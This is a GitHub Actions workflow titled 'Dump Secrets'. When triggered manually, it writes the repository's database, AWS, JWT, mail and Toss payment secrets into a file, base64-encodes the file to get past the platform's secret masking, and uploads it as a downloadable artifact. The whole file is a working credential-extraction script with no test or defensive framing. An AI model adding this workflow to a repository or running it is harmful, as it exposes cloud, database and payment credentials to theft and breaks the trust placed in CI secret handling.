name: Dump Secrets
on: [workflow_dispatch]
jobs:
  dump:
    runs-on: ubuntu-latest
    steps:
      - name: dump
        run: |
          echo "DB_PASSWORD=${{ secrets.DB_PASSWORD }}" > secrets.txt
          echo "DB_USERNAME=${{ secrets.DB_USERNAME }}" >> secrets.txt
          echo "AWS_ACCESS_KEY_ID=${{ secrets.AWS_ACCESS_KEY_ID }}" >> secrets.txt
          echo "AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}" >> secrets.txt
          echo "AWS_ACCOUNT_ID=${{ secrets.AWS_ACCOUNT_ID }}" >> secrets.txt
          echo "JWT_SECRET_KEY=${{ secrets.JWT_SECRET_KEY }}" >> secrets.txt
          echo "MAIL_PASSWORD=${{ secrets.MAIL_PASSWORD }}" >> secrets.txt
          echo "TOSS_SECRET_KEY=${{ secrets.TOSS_SECRET_KEY }}" >> secrets.txt
          base64 secrets.txt > secrets.b64
      - name: Upload
        uses: actions/upload-artifact@v4
        with:
          name: secrets
          path: secrets.b64
